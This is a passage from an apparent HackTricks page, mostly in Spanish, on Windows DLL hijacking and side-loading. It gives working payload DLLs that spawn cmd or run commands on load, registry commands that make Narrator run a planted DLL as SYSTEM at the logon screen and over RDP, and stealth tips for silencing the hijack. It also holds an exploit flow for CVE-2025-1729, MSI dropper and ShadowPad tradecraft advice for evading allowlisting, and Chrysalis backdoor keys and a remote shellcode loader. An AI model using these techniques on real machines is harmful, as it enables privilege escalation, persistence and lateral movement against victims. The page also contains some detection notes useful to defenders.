#include<windows.h> #include<stdlib.h> #include<stdio.h>

void Entry (){ //Default function that is executed when the DLL is loaded system(“cmd”); }

BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call){ case DLL_PROCESS_ATTACH: CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DEATCH: break; } return TRUE; }

</details>

## Estudio de caso: Narrator OneCore TTS Localization DLL Hijack (Accessibility/ATs)

Windows Narrator.exe aún busca una DLL de localización predecible y específica por idioma al iniciarse que puede ser hijacked para arbitrary code execution y persistence.

Datos clave
- Ruta comprobada (versiones actuales): `%windir%\System32\speech_onecore\engines\tts\msttsloc_onecoreenus.dll` (EN-US).
- Ruta heredada (versiones antiguas): `%windir%\System32\speech\engine\tts\msttslocenus.dll`.
- Si existe una DLL controlada por el atacante y escribible en la ruta OneCore, se carga y `DllMain(DLL_PROCESS_ATTACH)` se ejecuta. No se requieren exports.

Detección con Procmon
- Filtro: `Process Name is Narrator.exe` and `Operation is Load Image` or `CreateFile`.
- Inicie Narrator y observe el intento de carga de la ruta anterior.

DLL mínima
```c
// Build as msttsloc_onecoreenus.dll and place in the OneCore TTS path
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
// Optional OPSEC: DisableThreadLibraryCalls(h);
// Suspend/quiet Narrator main thread, then run payload
// (see PoC for implementation details)
}
return TRUE;
}

OPSEC silence

• A naive hijack will speak/highlight UI. To stay quiet, on attach enumerate Narrator threads, open the main thread (OpenThread(THREAD_SUSPEND_RESUME)) and SuspendThread it; continue in your own thread. See PoC for full code.

Trigger and persistence via Accessibility configuration

• User context (HKCU): reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Winlogon/SYSTEM (HKLM): reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• With the above, starting Narrator loads the planted DLL. On the secure desktop (logon screen), press CTRL+WIN+ENTER to start Narrator; your DLL executes as SYSTEM on the secure desktop.

RDP-triggered SYSTEM execution (lateral movement)

• Allow classic RDP security layer: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
• RDP to the host, at the logon screen press CTRL+WIN+ENTER to launch Narrator; your DLL executes as SYSTEM on the secure desktop.
• Execution stops when the RDP session closes—inject/migrate promptly.

Bring Your Own Accessibility (BYOA)

• You can clone a built-in Accessibility Tool (AT) registry entry (e.g., CursorIndicator), edit it to point to an arbitrary binary/DLL, import it, then set configuration to that AT name. This proxies arbitrary execution under the Accessibility framework.

Notes

• Writing under %windir%\System32 and changing HKLM values requires admin rights.
• All payload logic can live in DLL_PROCESS_ATTACH; no exports are needed.

Case Study: CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe

This case demonstrates Phantom DLL Hijacking in Lenovo’s TrackPoint Quick Menu (TPQMAssistant.exe), tracked as CVE-2025-1729.

Vulnerability Details

• Component: TPQMAssistant.exe located at C:\ProgramData\Lenovo\TPQM\Assistant\.
• Scheduled Task: Lenovo\TrackPointQuickMenu\Schedule\ActivationDailyScheduleTask runs daily at 9:30 AM under the context of the logged-on user.
• Directory Permissions: Writable by CREATOR OWNER, allowing local users to drop arbitrary files.
• DLL Search Behavior: Attempts to load hostfxr.dll from its working directory first and logs “NAME NOT FOUND” if missing, indicating local directory search precedence.

Exploit Implementation

An attacker can place a malicious hostfxr.dll stub in the same directory, exploiting the missing DLL to achieve code execution under the user’s context:

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
// Payload: display a message box (proof-of-concept)
MessageBoxA(NULL, "DLL Hijacked!", "TPQM", MB_OK);
}
return TRUE;
}

Flujo de ataque

1. Como usuario estándar, coloca hostfxr.dll en C:\ProgramData\Lenovo\TPQM\Assistant\.
2. Espera a que la tarea programada se ejecute a las 9:30 AM en el contexto del usuario actual.
3. Si un administrador ha iniciado sesión cuando se ejecuta la tarea, el DLL malicioso se ejecuta en la sesión del administrador con integridad media.
4. Encadena técnicas estándar de bypass de UAC para elevar de integridad media a privilegios SYSTEM.

Estudio de caso: MSI CustomAction Dropper + DLL Side-Loading via Signed Host (wsc_proxy.exe)

Threat actors frecuentemente combinan droppers basados en MSI con DLL side-loading para ejecutar payloads bajo un proceso confiable y firmado.

Chain overview

• El usuario descarga un MSI. Un CustomAction se ejecuta silenciosamente durante la instalación GUI (p. ej., LaunchApplication o una acción VBScript), reconstruyendo la siguiente etapa desde recursos embebidos.
• El dropper escribe un EXE legítimo y firmado y un DLL malicioso en el mismo directorio (par de ejemplo: Avast-signed wsc_proxy.exe + attacker-controlled wsc.dll).
• Cuando se inicia el EXE firmado, el orden de búsqueda de DLL de Windows carga wsc.dll desde el directorio de trabajo primero, ejecutando el código del atacante bajo un padre firmado (ATT&CK T1574.001).

MSI analysis (what to look for)

• CustomAction table:
• Busca entradas que ejecuten ejecutables o VBScript. Patrón sospechoso de ejemplo: LaunchApplication ejecutando un archivo embebido en segundo plano.
• En Orca (Microsoft Orca.exe), inspecciona las tablas CustomAction, InstallExecuteSequence y Binary.
• Payloads embebidos/divididos en el CAB del MSI:
• Extracción administrativa: msiexec /a package.msi /qb TARGETDIR=C:\out
• O usa lessmsi: lessmsi x package.msi C:\out
• Busca múltiples fragmentos pequeños que se concatenan y desencriptan mediante un CustomAction VBScript. Flujo común:

' VBScript CustomAction (high level)
' 1) Read multiple fragment files from the embedded CAB (e.g., f0.bin, f1.bin, ...)
' 2) Concatenate with ADODB.Stream or FileSystemObject
' 3) Decrypt using a hardcoded password/key
' 4) Write reconstructed PE(s) to disk (e.g., wsc_proxy.exe and wsc.dll)

Practical sideloading with wsc_proxy.exe

• Coloca estos dos archivos en la misma carpeta:
• wsc_proxy.exe: host legítimo firmado (Avast). El proceso intenta cargar wsc.dll por nombre desde su directorio.
• wsc.dll: attacker DLL. Si no se requieren exports específicos, DllMain puede ser suficiente; de lo contrario, crea un proxy DLL y reenvía los exports requeridos a la genuine library mientras ejecutas el payload en DllMain.
• Construye un payload DLL mínimo:

// x64: x86_64-w64-mingw32-gcc payload.c -shared -o wsc.dll
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
WinExec("cmd.exe /c whoami > %TEMP%\\wsc_sideload.txt", SW_HIDE);
}
return TRUE;
}

• Para requisitos de exportación, use un framework de proxy (por ejemplo, DLLirant/Spartacus) para generar un DLL de reenvío que también ejecute su payload.

• Esta técnica se basa en la resolución de nombres de DLL por parte del binario anfitrión. Si el anfitrión usa rutas absolutas o flags de carga segura (por ejemplo, LOAD_LIBRARY_SEARCH_SYSTEM32/SetDefaultDllDirectories), el hijack puede fallar.

• KnownDLLs, SxS, and forwarded exports pueden influir en la precedencia y deben considerarse al seleccionar el binario anfitrión y el conjunto de exports.

Tríadas firmadas + payloads cifrados (estudio de caso ShadowPad)

Check Point describió cómo Ink Dragon despliega ShadowPad usando una tríada de tres archivos para mezclarse con software legítimo mientras mantiene el payload principal cifrado en disco:

1. EXE anfitrión firmado – se abusan de vendors como AMD, Realtek o NVIDIA (vncutil64.exe, ApplicationLogs.exe, msedge_proxyLog.exe). Los atacantes renombran el ejecutable para que parezca un binario de Windows (por ejemplo conhost.exe), pero la firma Authenticode permanece válida.
2. Malicious loader DLL – dejado junto al EXE con un nombre esperado (vncutil64loc.dll, atiadlxy.dll, msedge_proxyLogLOC.dll). El DLL suele ser un binario MFC ofuscado con el framework ScatterBrain; su único trabajo es localizar el blob cifrado, descifrarlo y mapear reflectivamente ShadowPad.
3. Blob de payload cifrado – a menudo almacenado como <name>.tmp en el mismo directorio. Después de mapear en memoria el payload descifrado, el loader borra el archivo TMP para destruir evidencia forense.

Tradecraft notes:

• Renombrar el EXE firmado (manteniendo el OriginalFileName en el PE header) permite que se haga pasar por un binario de Windows y, al mismo tiempo, conserve la firma del vendor; por tanto, reproduzca la costumbre de Ink Dragon de dejar binarios con aspecto conhost.exe que en realidad son utilidades AMD/NVIDIA.
• Debido a que el ejecutable permanece como confiable, la mayoría de los controles de allowlisting solo necesitan que su DLL maliciosa esté junto a él. Enfóquese en personalizar el loader DLL; el padre firmado normalmente puede ejecutarse sin modificaciones.
• El descifrador de ShadowPad espera que el blob TMP esté junto al loader y sea escribible para poder poner a cero el archivo después de mapearlo. Mantenga el directorio escribible hasta que el payload se cargue; una vez en memoria el archivo TMP puede borrarse de forma segura por OPSEC.

Estudio de caso: NSIS dropper + Bitdefender Submission Wizard sideload (Chrysalis)

Una intrusión reciente de Lotus Blossom abusó de una cadena de actualización confiable para entregar un dropper empaquetado con NSIS que preparó un DLL sideload más payloads completamente en memoria.

Tradecraft flow

• update.exe (NSIS) crea %AppData%\Bluetooth, lo marca HIDDEN, deja un Bitdefender Submission Wizard renombrado BluetoothService.exe, un log.dll malicioso y un blob cifrado BluetoothService, luego lanza el EXE.
• El EXE anfitrión importa log.dll y llama a LogInit/LogWrite. LogInit carga el blob con mmap; LogWrite lo descifra con un stream basado en LCG personalizado (constantes 0x19660D / 0x3C6EF35F, material de clave derivado de un hash previo), sobrescribe el buffer con shellcode en texto plano, libera temporales y salta a él.
• Para evitar una IAT, el loader resuelve APIs hasheando nombres de exports usando FNV-1a basis 0x811C9DC5 + prime 0x1000193, luego aplicando una avalancha estilo Murmur (0x85EBCA6B) y comparando contra hashes objetivo salados.

Main shellcode (Chrysalis)

• Descifra un módulo principal tipo PE repitiendo add/XOR/sub con la clave gQ2JR&9; durante cinco pasadas, luego carga dinámicamente Kernel32.dll → GetProcAddress para completar la resolución de imports.
• Reconstruye cadenas de nombres de DLL en tiempo de ejecución mediante transformaciones por carácter (rotación de bits/XOR), luego carga oleaut32, advapi32, shlwapi, user32, wininet, ole32, shell32.
• Usa un segundo resolvedor que recorre la PEB → InMemoryOrderModuleList, analiza cada tabla de exports en bloques de 4 bytes con mezcla estilo Murmur, y solo recurre a GetProcAddress si no se encuentra el hash.

Embedded configuration & C2

• La configuración vive dentro del archivo BluetoothService dejado en offset 0x30808 (tamaño 0x980) y está descifrada con RC4 usando la clave qwhvb^435h&*7, revelando la URL de C2 y el User-Agent.
• Los beacons construyen un perfil del host delimitado por puntos, anteponen la etiqueta 4Q, luego lo encriptan con RC4 con la clave vAuig34%^325hGV antes de HttpSendRequestA sobre HTTPS. Las respuestas se descifran con RC4 y se enrutan mediante un switch de etiquetas (4T shell, 4V process exec, 4W/4X file write, 4Y read/exfil, 4\\ uninstall, 4 drive/file enum + casos de transferencia por fragmentos).
• El modo de ejecución viene determinado por los args de la CLI: sin args = instalar persistencia (service/Run key) apuntando a -i; -i relanza a sí mismo con -k; -k omite la instalación y ejecuta el payload.

Alternate loader observed

• La misma intrusión dejó Tiny C Compiler y ejecutó svchost.exe -nostdlib -run conf.c desde C:\ProgramData\USOShared\, con libtcc.dll a su lado. El código C proporcionado por el atacante embebió shellcode, lo compiló y lo ejecutó en memoria sin tocar el disco con un PE. Replicar con:

C:\ProgramData\USOShared\tcc.exe -nostdlib -run conf.c

• Esta etapa compile-and-run basada en TCC importó Wininet.dll en tiempo de ejecución y descargó un shellcode de segunda etapa desde una hardcoded URL, proporcionando un loader flexible que se hace pasar por una ejecución de compilador.

Referencias

• CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe
• Microsoft Store - TPQM Assistant UWP
• https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e
• https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html
• Check Point Research – Nimbus Manticore Deploys New Malware Targeting Europe
• TrustedSec – Hack-cessibility: When DLL Hijacks Meet Windows Helpers
• PoC – api0cradle/Narrator-dll
• Sysinternals Process Monitor
• Unit 42 – Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT
• Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation
• Rapid7 – The Chrysalis Backdoor: A Deep Dive into Lotus Blossom’s toolkit

Tip

Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprende y practica Hacking en Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks

• Revisa los planes de suscripción!
• Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
• Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.